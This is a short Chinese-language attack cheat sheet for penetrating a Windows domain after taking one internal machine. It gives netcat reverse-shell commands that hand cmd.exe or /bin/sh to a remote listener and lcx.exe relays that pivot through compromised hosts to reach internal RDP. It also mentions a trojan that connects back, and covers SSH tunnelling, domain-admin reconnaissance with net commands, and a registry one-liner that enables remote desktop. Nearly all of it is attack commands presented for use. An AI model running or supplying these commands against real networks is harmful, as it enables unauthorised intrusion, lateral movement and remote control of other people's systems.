內網域滲透的先決條件
首先你要能拿下一台域內的機器,然后才能開始域滲透。道理很簡單,就不啰嗦了。介紹一些windows反彈shell的方法:
.\nc.exe -e cmd.exe 192.168.1.1 4444
.\nc 192.168.1.1 4444 -e /bin/sh
nc -l 4444 -vvv
內網穿外網
方案一 正想開口等連接
.\lcx.exe -slave 192.168.10.100 4444 192.168.20.201 3389 #192.168.20.201為內網肉機,192.168.10.100是邊界肉機
.\lcx.exe -listen 4444 8888 #在邊界肉機上
mstsc 192.168.10.100 8888 #在攻擊者主機上
方案二 返向直接連回去
木馬會連地址20.20.20.10 #在內網肉機配置木馬,反連20.20.20.10是邊界肉機,上線端口8888
.\lcx.exe -listen 4444 8888 #在邊界肉機上
.\lcx.exe -slave 20.20.20.10 4444 127.0.0.1 4444 #在攻擊者主機上
關於ssh端口轉發
ssh -C -f -N -g -L 55555:127.0.0.1:8080 a003797@127.0.0.1 #本地端口(55555)到目標地址(127.0.0.1)的目標端口(8080),后面是必須ssh到對方應該是對段的username@IP地址
ssh -C -f -N -g -R 55555:127.0.0.1:8080 a003797@127.0.0.1 #目標地址(127.0.0.1)的目標端口(8080)到本地端口(55555),后面是必須ssh到對方應該是對段的username@IP地址
ssh -C -f -N -g -D listen_port user@Tunnel_Host #不常用,動態監測
最后配置ssr代理
不詳細介紹
域滲透的信息收集
查詢本機信息
C:\Windows\system32>fsutil.exe fsinfo drives #查詢盤符信息
C:\Windows\system32>systeminfo #查詢系統信息
C:\Windows\system32>ipconfig /all #查詢網絡信息
查詢域信息
C:\Windows\system32>net view /domain#查詢域
C:\Windows\system32>net group /domain #查詢組
C:\Windows\system32>net user /domain #查詢域用戶
C:\Windows\system32>net group “domain admins” /domain #查詢域管信息
C:\Windows\system32>net group "domain computer" /domain #查詢域內機器信息
查看網絡、服務、進程信息
C:\Windows\system32>netstat -anb -p tcp#查詢網絡服務及PID
C:\Windows\system32>tasklist #查看進程信息
C:\Windows\system32>taskkill /f /im process-name #殺掉進程
一鍵開啟3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
